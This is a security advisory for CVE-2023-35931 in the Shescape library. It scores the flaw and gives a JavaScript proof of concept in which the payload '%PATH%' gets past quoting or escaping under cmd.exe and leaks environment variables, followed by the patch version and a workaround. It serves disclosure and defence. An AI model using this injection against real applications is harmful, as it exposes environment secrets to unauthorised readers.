4.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
0.001 Low
EPSS
Percentile
30.2%
This impact users of Shescape:
cmd.exe
), andquote
/quoteAll
or escape
/escapeAll
with the interpolation
option set to true
.An attacker may be able to get read-only access to environment variables. Example:
import * as cp from "node:child_process";
import * as shescape from "shescape";
// 1. Prerequisites
const options = {
shell: "cmd.exe",
// Or
shell: undefined, // Only if the default shell is CMD
// And
interpolation: true, // Only applies to `escape` and `escapeAll` usage
}
// 2. Attack (one of many)
const payload = "%PATH%";
// 3. Usage
let escapedPayload;
escapedPayload = shescape.quote(payload, options);
// Or
escapedPayload = shescape.quoteAll([payload], options);
// Or
escapedPayload = shescape.escape(payload, options);
// Or
escapedPayload = shescape.escapeAll([payload], options);
// And (example)
const result = cp.execSync(`echo Hello ${escapedPayload}`, options);
// 4. Impact
console.log(result.toString());
// Outputs "Hello" followed by the contents of the PATH environment variable
This bug has been patched in v1.7.1 which you can upgrade to now. No further changes are required.
Alternatively, users can remove all instances of %
from user input, either before or after using Shescape.
github.com/advisories/GHSA-3g7p-8qhx-mc8r
github.com/ericcornelissen/shescape/commit/d0fce70f987ac0d8331f93cb45d47e79436173ac
github.com/ericcornelissen/shescape/pull/982
github.com/ericcornelissen/shescape/releases/tag/v1.7.1
github.com/ericcornelissen/shescape/security/advisories/GHSA-3g7p-8qhx-mc8r
nvd.nist.gov/vuln/detail/CVE-2023-35931